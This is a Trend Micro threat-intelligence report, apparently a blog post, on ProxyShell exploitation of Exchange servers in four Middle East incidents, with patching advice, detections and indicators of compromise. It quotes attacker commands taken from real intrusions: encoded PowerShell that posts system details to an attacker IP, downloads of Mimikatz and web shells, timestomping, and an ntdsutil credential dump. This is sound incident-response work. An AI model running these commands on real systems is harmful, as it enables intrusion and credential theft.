Trend Micro Inc.

11/17/2021 | News release | Distributed by Public on 11/17/2021 07:11

Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

The Trend Trend Micro™ Managed XDR team recently observed a surge in server-side compromises - ProxyShell-related intrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.

In the engagements where the attacker's objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization's system, with the possibility of ransomware attacks being launched down the line.

Using intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share a commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target's network, were rooted from an IIS Worker Process that was spawning suspicious processes.

Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor's objective.

We clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whetherLockFile,Conti, or any current active ransomware families in the Middle East threat landscape will be deployed as part of the routine).

In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.

Observations on the ProxyShell Exploitation

The exploitation of ProxyShell in these attacks involve three vulnerabilities:CVE-2021-34473,CVE-2021-34523andCVE-2021-31207- the first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of these vulnerabilities can lead to arbitrary writing of files that an attacker can leverage toupload web shells on a target exchange server.

The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them.

Figure 1. Scanning for web shells

CVE-2021-34473: pre-auth path confusion

This vulnerability abuses the URL normalization of Explicit Logon URL, where the login email will be removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITY\SYSTEM).
Figure 2. Exploiting CVE-2021-34473

The Autodiscover service is abused to leak a known user's distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).

CVE-2021-34523: Exchange PowerShell Backend Elevation-of-Privilege

Microsoft Exchange has a PowerShell remoting feature which can be used to read and send emails. This functionality cannot be used by NT AUTHORITY\SYSTEM as it doesn't have a mailbox, however, the backend /powershell can be provided via the X-Rps-CAT query string parameter in case it is accessed directly using the previous vulnerability, which will be deserialized and used to restore the user identity.

This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.

Figure 3. An attacker using local administrator account administrator@xxxx along with its SID

CVE-2021-31207: Post-auth Arbitrary-File-Write

This vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an arbitrary file location, which can be used to write a shell on the Exchange server.
Figure 4. Access to the web shell after being imported

The web shell is imported as mail inside theadministrator@xxxdraft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.

An analysis of the file system timeline shows the same - the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC)

Figure 5. The system timeline showing the creation of the file puqjc.aspx

Post-exploitation routines

A web shell is a piece of code written in web development programming language (e.g., ASP, JSP) that attackers can drop into web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim's server, it can allow remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.

Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.

The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.

Incident # 1

The first web shell

Figure 6. Code showing the exec_code query parameter

In the first incident we handled, we discovered that the web shell employed in the attack usesexec_codequery parameter to execute ASP code. After successfully accessing the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.

  • "c:\windows\system32\cmd.exe" /c whoami
  • "c:\windows\system32\cmd.exe" /c ping -n 1 google.com

Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.

Figure 7. Executing PowerShell commands and downloading other malware

rundll.bat

The web shell includes a script that kills security software from specific vendors, and then disables the system's firewall.
Figure 8. Code showing how the script terminates security software

It then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected machines.

Figure. 9 Decoded PowerShell command to download and execute Cobalt Strike
Figure 10. Code from the Cobalt Strike obfuscated PowerShell

We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.

Figure 11. Script designed to kill PowerShell-related processes

Liferay CMS

The IP addresses 212.84.32[.]13 and 103.25.196[.]33, are servers using theLiferay content managing system(CMS). It seems that these are compromised versions of the software and being used to host the post-exploitation malicious payloads on different ports other than the default ones (80, 443, 8080) used by the CMS.
Figure 12. Properties of the Liferay CMS versions found on the IP addresses 212.84.32[.]13 and 103.25.196[.]33

Both servers are using Liferay CE version 6.2, which is vulnerable toCVE-2020-7961(possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don't have information as to what was downloaded since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

  • cmd.exe /c ipconfig
  • cmd.exe /c dir
  • "c:\windows\system32\cmd.exe" /c ping -n 1 google.com
  • "c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

  • cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
  • "c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:

"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"

The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:

Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"

The web shell was then moved to the OWA directory with the following time stamp:

$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;

After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.

  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll

In relation to this incident, we found the following malicious components and malware were used:

  • OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
  • App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
  • App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to thebespoke web shellthe KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.
Figure 13. The web shell written in C#
Figure 14. C# web shell function which executes the Base64 command in CMD
Figure 15. Web shell response for known inputs only, otherwise it will respond with error code 404

Incident #3

The third incident was different from the first two incidents in terms of credential dumping techniques and lateral movement within the system.In this case, the Microsoft Process Dump tool was used to dump LSSAS and extract the hashes.
Figure 16. The execution for procedump.exe during the active attack

The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.

Apass-the-hash attack techniquewas used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.

Figure 17. Using a pass-the-hash technique for remote access

The following malware were dropped on the infected machines:

  • CacheTask.dll (Backdoor.Win32.COTX.A)
  • dllhost.exe (PUA.Win64.LanGO.B)
  • HostDLL.exe (Trojan.Win64.OGNHOST.A)
Persistence was then created on remote machines via scheduled task to keep the backdoor running.
Figure 18. Creating persistence via scheduled task

Incident # 4

We analyzed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the database via the NT Directory Service Utility:

"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit

Execution Profile

Here is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.
Figure 19. Trend Micro Vision One ™ console showing the post-exploitation routine using a ProxyShell instance

Security recommendations

For the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams.Microsoft had writtenin August 2021 that patching to the latest cumulative update (CU) or security update (SU) are indeed the first line of defense against threats that exploit vulnerabilities related to ProxyShell.

While mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these severs, it should be noted that these controls would only buy time before any actual patching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.

It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it's patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.

The implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year,Microsoft wrote an excellent guidefor hardening web servers against web shell-based attacks.

Trend Micro Solutions

The capabilities of theTrend Micro Vision One™platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in a user's environment by highlighting important attributes related to the attack.

Trend Micro Managed XDRoffers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.

TrendMicro Detections

Product Name
Detections
Endpoint Security products:
Real Time scan
Behavior monitoring
  • Backdoor.ASP.CHOPPER.ASPGJI
  • Backdoor.PHP.WEBSHELL.SBJKWQ
  • Backdoor.ASP.WEBSHELL.UWMAQF
  • ·Trojan.ASP.WEBSHELL.GIFCM
  • Trojan.ASP.CVE202127065.E
  • Trojan.PS1.COBEACON.SMYXAK-A
  • TROJ_FRS.VSNW1FH21
  • Backdoor.Win32.COTX.A ()
  • PUA.Win64.LanGO.B
  • Trojan.Win64.OGNHOST.A
  • Fileless.AMSI.PSCoBeacon
Endpoint Security:
Deep Security IPS:
  • 1011041 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-34473)
  • 1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2021-34523)
  • 1011072 - Microsoft Exchange Server Security Feature Bypass Vulnerability (CVE-2021-31207)
Network Security:
TippingPoint
  • 39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability (CVE-2021-34473)
  • 39534: HTTP: Microsoft Exchange Server PowerShell Code Execution Vulnerability (CVE-2021-34523)
  • 40057: HTTP: Microsoft Exchange Server Arbitrary File Write Vulnerability (CVE-2021-31207)
Network Security: DDI Deep Discovery Inspector
  • CVE-2021-34473 - EXCHANGE SSRF EXPLOIT - HTTP(REQUEST)
  • CVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)

Indicators of Compromise

Hashes

SHA256
Details
Detection Name
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066
rundll.bat
HackTool.BAT.WinDefKiller.C
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8
CacheTask.dll
Backdoor.Win32.COTX.A
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2
dllhost.exe
PUA.Win64.LanGO.B
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E
HostDLL.exe
Trojan.Win64.OGNHOST
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043
Trojan.PS1.COBEACON.SMYXAK-A

IPs & URL

  • hxxp:[//]103.25[.]196.33:51680[/]check.
  • hxxp:[//]212.84.32.13:18080[/]get
  • hxxps:[//]122.10.82.109:8090[/]connect
  • hxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx
  • 103[.]25[.]196[.]33
  • 212[.]84[.]32[.]13
  • 122[.]10[.]82[.]109
  • 209.14.0[.]234

Strings(IIS Logs)

  • autodiscover/autodiscover.json
  • @evil.corp
  • python-requests
  • /powershell/?X-Rps-CAT
  • Cmd commands like (whoami, taskkill, ping, dir, ipconfig)

Vulnerabilities

  • CVE-2021-34473
  • CVE-2021-34523
  • CVE-2021-31207
Tags

Authors

  • Mohamed Fahmy
  • Threat Intelligence Analyst
  • Abdelrhman Sharshar
  • Threat Intelligence Analyst
  • Sherif Magdy
  • Threat Intelligence Analyst
  • Ryan Maglaque
  • Threats Analyst